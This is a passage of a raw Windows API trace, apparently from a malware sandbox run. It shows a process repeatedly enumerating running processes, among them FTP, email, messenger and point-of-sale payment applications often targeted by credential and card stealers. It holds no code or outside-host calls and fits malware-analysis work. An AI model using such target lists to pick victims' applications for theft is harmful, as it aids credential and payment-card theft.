cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0207.579] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0207.581] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0207.583] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0207.585] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0207.588] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0207.591] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0207.592] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0207.594] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0207.596] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0207.598] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0207.600] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0207.601] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0207.603] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0207.606] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0207.608] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0207.610] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0207.612] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0207.614] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0207.617] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0207.619] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0207.671] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0207.674] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0207.676] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0207.679] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0207.681] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0207.685] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0207.687] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0207.690] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0207.692] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0207.694] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0207.697] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0207.701] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0207.703] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0207.705] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0207.708] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0207.710] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0207.712] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0207.869] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0207.883] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0207.884] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0207.889] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0207.891] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0207.893] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0207.894] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0207.896] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0207.897] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0207.899] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0207.900] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0207.905] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0207.907] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0207.909] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0207.910] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0207.912] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0207.913] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.915] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.916] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0207.970] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0207.972] CloseHandle (hObject=0x11cc) returned 1 [0207.972] Sleep (dwMilliseconds=0x64) [0208.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0208.116] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.118] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.120] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.122] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.124] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.125] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.127] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.128] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.130] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.131] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.132] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.134] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.136] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.138] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.139] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.140] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.142] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.143] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.145] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.146] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.147] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0208.149] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0208.150] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.342] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0208.344] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0208.346] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, 